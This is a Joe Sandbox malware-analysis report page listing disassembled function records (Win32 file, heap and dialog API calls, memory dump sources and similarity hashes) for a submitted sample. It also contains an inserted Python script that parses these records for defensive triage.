• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: CodeInfoPageValid
• String ID:
• API String ID: 546120528-0
• Opcode ID: fe5c41ab9181fbcd78dce79266ab30ed670701817477a5ea859b511b0c7cb416
• Instruction ID: e26918f56eef2340e4887b6b4ed1f83f4506bb1db638d9f39e26dacae501e914
• Opcode Fuzzy Hash: fe5c41ab9181fbcd78dce79266ab30ed670701817477a5ea859b511b0c7cb416
• Instruction Fuzzy Hash: 17513570A003499EDF20AF75E9816BBBBE5FF41304F1C446ED496CB652DB349941CB91
APIs
• SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00879A50,?,?,00000000,?,?,00878CBC,?), ref: 00879BAB
• GetLastError.KERNEL32(?,00000000,00878411,-00009570,00000000,000007F3), ref: 00879BB6
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: e8e3521423dc0b1c4ec8fab140f3c7770648e382e8ffd1c01e05b92dbbe716e1
• Instruction ID: 2237028a11da6a3433a204e4e87e73d131c11842de24bfa9ac8d53e85d491b54
• Opcode Fuzzy Hash: e8e3521423dc0b1c4ec8fab140f3c7770648e382e8ffd1c01e05b92dbbe716e1
• Instruction Fuzzy Hash: 28418B31604325CBDB24DF19E58456AB7E6FBA5330F14CA2DE8D9C3268D770ED448A52
APIs
  • Part of subcall function 008997E5: GetLastError.KERNEL32(?,008B1098,00894674,008B1098,?,?,008940EF,?,?,008B1098), ref: 008997E9
  • Part of subcall function 008997E5: _free.LIBCMT ref: 0089981C
  • Part of subcall function 008997E5: SetLastError.KERNEL32(00000000,?,008B1098), ref: 0089985D
  • Part of subcall function 008997E5: _abort.LIBCMT ref: 00899863
  • Part of subcall function 0089BB4E: _abort.LIBCMT ref: 0089BB80
  • Part of subcall function 0089BB4E: _free.LIBCMT ref: 0089BBB4
  • Part of subcall function 0089B7BB: GetOEMCP.KERNEL32(00000000,?,?,0089BA44,?), ref: 0089B7E6
• _free.LIBCMT ref: 0089BA9F
• _free.LIBCMT ref: 0089BAD5
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2991157371-0
                                                                                                                                                                                                    • Opcode ID: 47b3629febb0dfd654389754717a3a019a21e029ec903364b415a1f019c4e5aa
                                                                                                                                                                                                    • Instruction ID: a03813a6d904bfe080120b78d3614d7344dc48eda4dbdd493dfde14f47cde69c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47b3629febb0dfd654389754717a3a019a21e029ec903364b415a1f019c4e5aa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A31B131904219AFDF10FFA8EA41BADB7E5FF41320F294099E904DB2A2EB725D40DB51
APIs
• __EH_prolog.LIBCMT ref: 00871E55
  • Part of subcall function 00873BBA: __EH_prolog.LIBCMT ref: 00873BBF
• _wcslen.LIBCMT ref: 00871EFD
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: H_prolog$_wcslen
• String ID:
• API String ID: 2838827086-0
• Opcode ID: 82d37a20f2de14f287f43e79964f674e27eac1a662ee7002fd2defe42d583bfc
• Instruction ID: 8bd7313c71c5608fc4f31be1280d50c140aa272d2f964519b78cfa162eec55d0
• Opcode Fuzzy Hash: 82d37a20f2de14f287f43e79964f674e27eac1a662ee7002fd2defe42d583bfc
• Instruction Fuzzy Hash: 833118719041099ACF15EF9CC949AAEBBF5FF08310F104069E849E7655CB329E01DB61
APIs
• FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008773BC,?,?,?,00000000), ref: 00879DBC
• SetFileTime.KERNELBASE(?,?,?,?), ref: 00879E70
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: File$BuffersFlushTime
• String ID:
• API String ID: 1392018926-0
• Opcode ID: 1dffd2b5f14957326c971a82ed33f2c1a9fff89a2fc6b8dadb2b4449bef4c319
• Instruction ID: bfe659e61bc74419543d490420d95d0ef586b23fd7c274d966c626db9f12f7ce
• Opcode Fuzzy Hash: 1dffd2b5f14957326c971a82ed33f2c1a9fff89a2fc6b8dadb2b4449bef4c319
• Instruction Fuzzy Hash: 5B21E1322482459FC724DF28C491AAABFE8FF51304F08881DF4D9C3545D328D90D8B62
APIs
• CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00879F27,?,?,0087771A), ref: 008796E6
• CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00879F27,?,?,0087771A), ref: 00879716
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 34b87996dfe694b698845b12deca068fd4b7edb60b05385e5b555c93a7171c91
• Instruction ID: 182caea02a8beceddf10b42c2c95fb766c03c0e5481705ad838ca19ddb0f10be
• Opcode Fuzzy Hash: 34b87996dfe694b698845b12deca068fd4b7edb60b05385e5b555c93a7171c91
• Instruction Fuzzy Hash: 0221F1B10043446FE3708A68CC89BA773DCFB69324F008B18FAD9C25D9C374E8848631
APIs
• SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00879EC7
• GetLastError.KERNEL32 ref: 00879ED4
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: fba96cc0b6ef67880b2256c6b98c9219bc5c17540f45826294439f29b0812e35
• Instruction ID: 4445ef057b2dd30bc7ff0921b2839429a3c333e0eefa495db57ce4b5ee3947a3
• Opcode Fuzzy Hash: fba96cc0b6ef67880b2256c6b98c9219bc5c17540f45826294439f29b0812e35
• Instruction Fuzzy Hash: F911E9316007049BE734D62CCC45BA6B7E9FB45370F608629E197D26D4D7B0ED49C760
APIs
• _free.LIBCMT ref: 00898E75
  • Part of subcall function 00898E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00894286,?,0000015D,?,?,?,?,00895762,000000FF,00000000,?,?), ref: 00898E38
• HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,008B1098,008717CE,?,?,00000007,?,?,?,008713D6,?,00000000), ref: 00898EB1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: Heap$AllocAllocate_free
• String ID:
• API String ID: 2447670028-0
• Opcode ID: 34384e21a8bd2a5a0c0db9978d6c395210cb52fe1d1aabc7aeeeac76d5205fcb
• Instruction ID: f4458b7e47e6c56ec1cc055f1fc08fb23f3f22e9c6a49ab22e9123f3de934021
• Opcode Fuzzy Hash: 34384e21a8bd2a5a0c0db9978d6c395210cb52fe1d1aabc7aeeeac76d5205fcb
• Instruction Fuzzy Hash: 3BF0C232601217EADF213A69AC15B6F3758FF93B70B6C412AF814E7191DF61DD0091A1
APIs
• GetCurrentProcess.KERNEL32(?,?), ref: 008810AB
• GetProcessAffinityMask.KERNEL32(00000000), ref: 008810B2
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: Process$AffinityCurrentMask
• String ID:
• API String ID: 1231390398-0
• Opcode ID: 6758b46afcaa3dcec3c2eec3cd3995b29e5382fb3f26a9d058213be4b6c64e44
• Instruction ID: 5fb6b5dbfd31fb9e94df6a5da6d52db737f87ba0dcdf74f3f46e198a0a188a07
• Opcode Fuzzy Hash: 6758b46afcaa3dcec3c2eec3cd3995b29e5382fb3f26a9d058213be4b6c64e44
• Instruction Fuzzy Hash: 46E0DF32B00949ABDF09ABB49C098EBB3EDFA452043208179E503E3601FD34EE424BA0
APIs
• LoadStringW.USER32(008713B6,?,008B1098,008713B6), ref: 0087E678
• LoadStringW.USER32(008713B6,?,008B1098), ref: 0087E68F
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: LoadString
• String ID:
• API String ID: 2948472770-0
• Opcode ID: d3ddf43917fc8b31821e8886779dc863ae5a305254db91c78be9aaaa8c08e949
• Instruction ID: e370cff8c8039ee27ed8b7609d5fa99115f2b5012a8fca3d50e002abfdefe8ee
• Opcode Fuzzy Hash: d3ddf43917fc8b31821e8886779dc863ae5a305254db91c78be9aaaa8c08e949
• Instruction Fuzzy Hash: D7F0F836101259BBCF111F61EC08DEB7F69FF293907408016FE089A124E232C961EBA0
APIs
• SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0087A325,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A501
  • Part of subcall function 0087BB03: _wcslen.LIBCMT ref: 0087BB27
• SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0087A325,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A532
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AttributesFile$_wcslen
• String ID:
• API String ID: 2673547680-0
• Opcode ID: effb256fcf1cfde9cb226f8f408e3b54edbc6e5c47958de6c60a78699079f676
• Instruction ID: c159e2d60dc6097bd023e176030af345674d4b3fba17ed3e314ee9e8231a9abf
• Opcode Fuzzy Hash: effb256fcf1cfde9cb226f8f408e3b54edbc6e5c47958de6c60a78699079f676
• Instruction Fuzzy Hash: D6F0A932200209BBEF016FA0DC01FDE376DFB04389F48C060B848E6164DB31CA98EB10
APIs
• DeleteFileW.KERNELBASE(000000FF,?,?,0087977F,?,?,008795CF,?,?,?,?,?,008A2641,000000FF), ref: 0087A1F1
  • Part of subcall function 0087BB03: _wcslen.LIBCMT ref: 0087BB27
• DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0087977F,?,?,008795CF,?,?,?,?,?,008A2641), ref: 0087A21F
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: DeleteFile$_wcslen
• String ID:
• API String ID: 2643169976-0
• Opcode ID: ae2333225cefedbce9bf01eabd2caa47ea832b3275bc2bff6f03685ae5649b0a
• Instruction ID: f75fa0e1dd8048735b7ed14b1e37d0c1a074a606ab29b0214ae72825cacc4f4c
• Opcode Fuzzy Hash: ae2333225cefedbce9bf01eabd2caa47ea832b3275bc2bff6f03685ae5649b0a
• Instruction Fuzzy Hash: FDE092315502096BEB015F64DC45FDE375CFB09391F488021B948E2095EB61DEC4DA51
APIs
• GdiplusShutdown.GDIPLUS(?,?,?,?,008A2641,000000FF), ref: 0088ACB0
• CoUninitialize.COMBASE(?,?,?,?,008A2641,000000FF), ref: 0088ACB5
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: GdiplusShutdownUninitialize
• String ID:
• API String ID: 3856339756-0
• Opcode ID: 6f9386a55e444661d4c2017949ac6ba3285750d855c8918a73533c853a833dfe
• Instruction ID: 07ac680d1c0d28bce7f0f95f26d6caf9fa20df5fe4440ad28dedbd8921bc4cc7
• Opcode Fuzzy Hash: 6f9386a55e444661d4c2017949ac6ba3285750d855c8918a73533c853a833dfe
• Instruction Fuzzy Hash: 9DE06D72644651EFCB10AB5CDC06B49FBADFB89B20F00436AF416D3BA0CB74A800CB95
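The function records in this part of the report (an "APIs" list with call-site refs and subcall lines, the memory dump the function was carved from, and the "Similarity" identifiers) follow one regular text layout, so they can be parsed for bulk triage instead of scrolled through, for example to list every function in the 00870000 dump that reaches DeleteFileW or SetFileAttributesW directly or through a subcall, or to count which Win32 APIs the dump references most. The script below is an added example written for this page; it is not Joe Sandbox code. Its input is a constructed copy of three records from the listing above with the layout whitespace and link text removed; the dict layout and the function names are this example's own choices. An API hit on its own is not a verdict: thin wrappers around file-attribute and delete calls like these also occur in benign runtimes, so the output is a starting point for reading the function, not a classification.

```python
"""Parse Joe Sandbox IDA-plugin function records ("APIs" / "Memory Dump
Source" / "Similarity" blocks) into dicts and query them for triage.
Added example for this report page; not Joe Sandbox code."""
import re
from collections import Counter

# Constructed input: three records copied from the listing above, with the
# HTML layout whitespace and the "Download File" link text removed.
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(?,?), ref: 008810AB
• GetProcessAffinityMask.KERNEL32(00000000), ref: 008810B2
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: Process$AffinityCurrentMask
• String ID:
• API String ID: 1231390398-0
• Instruction Fuzzy Hash: 46E0DF32B00949ABDF09ABB49C098EBB3EDFA452043208179E503E3601FD34EE424BA0
APIs
• SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0087A325), ref: 0087A501
  • Part of subcall function 0087BB03: _wcslen.LIBCMT ref: 0087BB27
• SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800), ref: 0087A532
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Similarity
• API ID: AttributesFile$_wcslen
• API String ID: 2673547680-0
APIs
• DeleteFileW.KERNELBASE(000000FF,?,?,0087977F), ref: 0087A1F1
  • Part of subcall function 0087BB03: _wcslen.LIBCMT ref: 0087BB27
• DeleteFileW.KERNEL32(?,000000FF,?,00000800), ref: 0087A21F
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Similarity
• API ID: DeleteFile$_wcslen
• API String ID: 2643169976-0
"""

# One regex per line shape the plugin emits.
API_RE = re.compile(r"^•\s*(?P<name>[\w$]+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^•\s*Part of subcall function (?P<func>[0-9A-Fa-f]+):\s*"
                        r"(?P<name>[\w$]+)\.(?P<module>\w+)\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^•\s*Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>\w+)$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
SECTIONS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def parse_records(text):
    """Return one dict per function record, in report order."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":  # every record opens with its API list
                rec = {"apis": [], "subcalls": [], "associated": [], "fields": {}}
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue
        if section == "APIs":
            m = SUBCALL_RE.match(line)  # check the indented subcall shape first
            if m:
                rec["subcalls"].append(m.groupdict())
                continue
            m = API_RE.match(line)
            if m:
                d = m.groupdict()
                d["args"] = d["args"].split(",") if d["args"] else []
                rec["apis"].append(d)
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(line)
            if m:
                rec["source_file"], rec["offset"] = m["file"], int(m["offset"], 16)
                rec["based_on_pe"] = m["pe"] == "true"
            else:
                m = FIELD_RE.match(line)
                if m and m["key"] == "Associated":
                    rec["associated"].append(m["value"])
        else:  # "Joe Sandbox IDA Plugin" and "Similarity" are plain key: value fields
            m = FIELD_RE.match(line)
            if m:
                rec["fields"][m["key"]] = m["value"]
    return records


def functions_calling(records, api_names):
    """API ID labels of records whose direct or subcall APIs hit api_names."""
    wanted = set(api_names)
    hits = []
    for rec in records:
        names = {a["name"] for a in rec["apis"]} | {s["name"] for s in rec["subcalls"]}
        if names & wanted:
            hits.append(rec["fields"].get("API ID", "?"))
    return hits


def api_histogram(records):
    """Number of records that reference each API (counted once per record)."""
    counts = Counter()
    for rec in records:
        counts.update({a["name"] for a in rec["apis"]})
    return counts


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records parsed from dump at", hex(recs[0]["offset"]))
    print("file-system wrappers:", functions_calling(recs, {"DeleteFileW", "SetFileAttributesW"}))
    print(api_histogram(recs).most_common(5))
```

On a full report the same parser is fed the whole "Execution Graph" / function listing text; querying for the shared subcall 0087BB03 (the _wcslen helper) then shows which wrappers route through the same string-length routine, which is a quick way to group the runtime's file-API wrappers before opening any of them in a disassembler.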
APIs
• GetFileAttributesW.KERNELBASE(?,?,?,0087A23A,?,0087755C,?,?,?,?), ref: 0087A254
  • Part of subcall function 0087BB03: _wcslen.LIBCMT ref: 0087BB27
• GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0087A23A,?,0087755C,?,?,?,?), ref: 0087A280
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2673547680-0
                                                                                                                                                                                                    • Opcode ID: 94f55af22053761b8b6fb5cf272a0fd3d97c77dd59d8e26899e997e3d3d6a8d9
                                                                                                                                                                                                    • Instruction ID: d1a2a7a5da1ee532808af423ecae3076e5ddc36db8d9457a0a58d249a1c893cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94f55af22053761b8b6fb5cf272a0fd3d97c77dd59d8e26899e997e3d3d6a8d9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82E092315001289BDB10AB68CC05BD97758FB193E2F048261FD58E3195DB70DE44CAA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088DEEC
                                                                                                                                                                                                      • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 0088DF03
                                                                                                                                                                                                      • Part of subcall function 0088B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088B579
                                                                                                                                                                                                      • Part of subcall function 0088B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088B58A
                                                                                                                                                                                                      • Part of subcall function 0088B568: IsDialogMessageW.USER32(00010464,?), ref: 0088B59E
                                                                                                                                                                                                      • Part of subcall function 0088B568: TranslateMessage.USER32(?), ref: 0088B5AC
                                                                                                                                                                                                      • Part of subcall function 0088B568: DispatchMessageW.USER32(?), ref: 0088B5B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
